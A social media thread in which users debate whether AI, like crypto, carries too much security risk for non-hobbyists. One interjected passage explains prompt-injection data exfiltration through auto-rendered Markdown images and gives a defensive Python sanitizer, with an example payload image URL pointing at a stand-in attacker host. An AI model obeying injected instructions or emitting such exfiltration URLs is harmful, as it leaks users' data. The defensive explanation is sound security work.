another way "AI" is like crypto is that dudes are like "this is awesome, you have to do it!!" and you're like "ok, but isn't a ton of it scams, fraud, and stuff that puts me in danger of getting hacked?" and they are like "yeah, but all you have to do is [HUGE LIST OF CONVOLUTED NEW INFOSEC THINGS TO LEARN]"

yeah, i am not doing that.

@peter Only applies if you don't run/own your own models. "Run Sovereign" "Compute at Home" ;)
@ManyRoads not really — a local model can still get prompt-injected and tricked into exfiltrating your data if you're running OpenClaw agentic workflows or whatever
@peter I think you might be confusing model vulnerability with systemic incompetence. If you run a local LLM on a machine with open egress, auto-rendering Markdown, and unsanitized inputs, you’ve just built a local version of a leaky cloud. A Sovereign AI run on a hardened, air-gapped, or egress-filtered node isn’t ‘exfiltrating’ anything—it’s the only way to actually ensure the data stays in the room.
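(For anyone following along: the "auto-rendering Markdown" leak mentioned above is real — an injected model can emit a Markdown image whose URL smuggles your data to an attacker's server, and any renderer that auto-fetches images completes the exfiltration. A minimal sketch of one mitigation, stripping remote images before rendering; the function and pattern here are illustrative, not from any particular tool:)

```python
import re

# Markdown image syntax: ![alt text](url). A prompt-injected model can
# emit ![x](https://attacker.example/?d=SECRET); a renderer that
# auto-fetches images then ships SECRET off the box.
IMG_PATTERN = re.compile(r"!\[[^\]]*\]\([^)]*\)")

def sanitize_output(text: str) -> str:
    """Replace Markdown images in model output with an inert placeholder."""
    return IMG_PATTERN.sub("[image removed]", text)

print(sanitize_output("hi ![x](https://attacker.example/?d=SECRET) bye"))
# regular text and links pass through untouched
```

(This blunts exactly one exfiltration channel — which is sort of the original point: the full list of these is long.)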

@ManyRoads did you read my original post lol and I quote:

and they are like "yeah, but all you have to do is [HUGE LIST OF CONVOLUTED NEW INFOSEC THINGS TO LEARN]"

yeah, i am not doing that.

@peter Okie dokie
@ManyRoads (I am happy that people are figuring this stuff out and running models locally, just that, like crypto, there's a lot of esoteric risk involved, so it will probably never extend to the non-hobbyists)